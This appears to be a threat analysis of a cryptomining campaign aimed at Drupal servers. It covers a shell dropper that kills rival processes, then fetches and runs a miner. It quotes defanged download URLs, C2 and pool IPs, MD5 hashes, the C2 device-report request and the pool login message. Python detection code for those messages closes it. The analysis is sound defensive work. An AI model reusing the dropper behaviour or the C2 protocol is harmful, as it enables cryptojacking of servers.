ups.sh
- downloader: hxxp://164.132.159.56/drupal/ups.sh
- md5: 3dc00f7c2745bd791d7c7a7cfd9bea24
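- Checks whether an antd process exists; if it does, the script exits
- Kills all processes whose command starts with './'
- Kills perl processes
- Kills processes named 6f47*
- Downloads hxxp://164.132.159.56/drupal/2/prcsv, saves it as antd, and executes it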
antd
- downloader: hxxp://164.132.159.56/drupal/2/prcsv
- md5: a3420cd460e4188d281466dbbd4c36df
- Reports device information:
POST /drupal/__dp.php HTTP/1.0
Host: 164.132.159.56
Content-Type: application/x-www-form-urlencoded
Content-length: 38
cf=1&h=debian-amd64&c=1
md5=a1ebf0dabd050dcaf2852dc4c603c201 uri=hxxp://80.240.26.52:80/d/srd
md5=69f7f14d572aea08991ce5f912a260be uri=hxxp://80.240.26.52:80/d/lmmml
md5=5837ba0c00af258f948068c5335d64eb uri=hxxp://80.240.26.52:80/d/vlb
Mining pool: 95.179.153.229:80
Login information:
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"apt-get","algo":["cn/1","cn/0","cn/xtl","cn/msr","cn"]}}
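
For detection, the two messages quoted above (the device report POST and the mining pool login) can be matched in captured payloads. The following is an added example, not code from the original analysis; the function names are hypothetical, the samples are constructed from the messages on this page, and matching on the path suffix, the form field names and the "cn" algorithm names is an assumed heuristic.

```python
import json
from urllib.parse import parse_qs

def is_miner_login(payload: bytes) -> bool:
    """True for a JSON-RPC 'login' whose algo list names cn / cn/* algorithms."""
    try:
        msg = json.loads(payload.decode("utf-8", "replace").strip())
    except ValueError:
        return False
    if not isinstance(msg, dict) or msg.get("method") != "login":
        return False
    params = msg.get("params")
    algos = params.get("algo") if isinstance(params, dict) else None
    return isinstance(algos, list) and any(
        isinstance(a, str) and (a == "cn" or a.startswith("cn/")) for a in algos)

def is_device_report(payload: bytes) -> bool:
    """True for an HTTP POST to .../__dp.php carrying the cf, h and c form fields."""
    text = payload.decode("latin-1").replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0] != "POST":
        return False
    if not request_line[1].split("?", 1)[0].endswith("/__dp.php"):
        return False
    return {"cf", "h", "c"}.issubset(parse_qs(body.strip()))

def classify(payload: bytes):
    if is_miner_login(payload):
        return "miner-login"
    if is_device_report(payload):
        return "device-report"
    return None

# Constructed samples: the two messages quoted on this page plus two benign payloads.
SAMPLES = [
    b"POST /drupal/__dp.php HTTP/1.0\r\nHost: 164.132.159.56\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\ncf=1&h=debian-amd64&c=1",
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x",'
    b'"agent":"apt-get","algo":["cn/1","cn/0","cn/xtl","cn/msr","cn"]}}',
    b"POST /login HTTP/1.1\r\nHost: example.test\r\n\r\nuser=a&c=1",
    b'{"id":2,"jsonrpc":"2.0","method":"status","params":{}}',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```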